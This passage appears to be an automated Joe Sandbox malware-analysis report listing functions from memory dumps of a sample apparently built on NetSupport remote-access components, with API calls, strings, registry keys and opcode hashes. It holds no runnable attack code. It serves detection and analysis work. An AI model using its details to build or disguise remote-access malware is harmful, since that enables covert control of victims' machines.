inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852

Strings

gfff, xrefs: 6C5D5890

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: inet_ntoa
String ID: gfff
API String ID: 1879540557-1553575800
Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
Instruction ID: 477018614ad807c104869332b51e32acb4aac172d6e7d0a05e9ed5f9057b1eb7
Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
Instruction Fuzzy Hash: 611189326083D68BC3068A2EAC602D7BFD9DB86251B2D4569D8C9CB701C611E84AC7D0

Function 11026B40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 11026B6D

Strings

?:\, xrefs: 11026B62

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ?:\
API String ID: 338552980-2533537817
Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791

Function 110ED1A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D

RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC

Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B

Strings

Error %d Opening regkey %s, xrefs: 110ED1CA

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0

Function 110ED160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D

Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B

Strings

Error %d closing regkey %x, xrefs: 110ED17D

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Closewvsprintf
String ID: Error %d closing regkey %x
API String ID: 843752472-892920262
Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664

Function 111463D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,013FB8D8,?,?,?,00000100,?,?,00000009), ref: 111463E9

Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA

Strings

NSMTRACE, xrefs: 111463E4

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: NSMTRACE
API String ID: 4133054770-4175627554
Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714

Function 11025CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8

Strings

psapi.dll, xrefs: 11025CD1

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80

Function 6C5D4F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,6C5D8DC8), ref: 6C5D4F78

Strings

psapi.dll, xrefs: 6C5D4F71

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: da9ba6b9108b5a1da7a69163ff45c9fd3a871f795f47dd764ef31cb7843d73a1
Instruction ID: 346e92fae3619d098be94a854bc999274014aaf96139f4514e4f6619d58bc06a
Opcode Fuzzy Hash: da9ba6b9108b5a1da7a69163ff45c9fd3a871f795f47dd764ef31cb7843d73a1
Instruction Fuzzy Hash: 11E001B1A01B108F87B0CF3EA544642BEF0BB086523118E2EA09EC3A00E730A5848F84

Function 11014F80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E

Strings

nslsp.dll, xrefs: 11014F83

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: nslsp.dll
API String ID: 1029625771-3933918195
Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4

Function 11074DC0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11074E1F
FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: FreeLibrary_memset
String ID:
API String ID: 1654520187-0
Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1

Function 110883D0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110883EF
InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_memset
String ID:
API String ID: 453477542-0
Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94

Function 11144440 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
ExtractIconExA.SHELL32(?,00000000,000304B1,000204A5,00000001), ref: 11144498

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51

Function 11163DB7 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF

__lock_file.LIBCMT ref: 11163DFE

Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE

__fclose_nolock.LIBCMT ref: 11163E09

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56

Function 6C5E6C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 6C5E6C26
Sleep.KERNEL32(00000064), ref: 6C5E6C5B

Part of subcall function 6C5E6940: GetTickCount.KERNEL32 ref: 6C5E6950

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: f1395915c1e69caa02b37049a3f34b92a0f1bc81fe28f4ce928e322978903d14
Instruction ID: 5c06991088173c470f759b7a2080c7f30e7aae5c20f2013a738cd78e48c7af01
Opcode Fuzzy Hash: f1395915c1e69caa02b37049a3f34b92a0f1bc81fe28f4ce928e322978903d14
Instruction Fuzzy Hash: C6F03071700308CECF14EA6A9D9635CB6B1DBA639AF120037C616D6E90DF745884C749

Function 6C5D63A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON

Download Yara Rule

APIs

WSACancelBlockingCall.WSOCK32 ref: 6C5D63A9
Sleep.KERNEL32(00000032), ref: 6C5D63B3

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: BlockingCallCancelSleep
String ID:
API String ID: 3706969569-0
Opcode ID: c443bbb7c17a30be6c3a42f858cb2093c76a35b5b8b0053dda7328189b0e033c
Instruction ID: f274e3945454fef5c1105bf473dafe4b7b9938a92db539b2a6d72b189ff1db9d
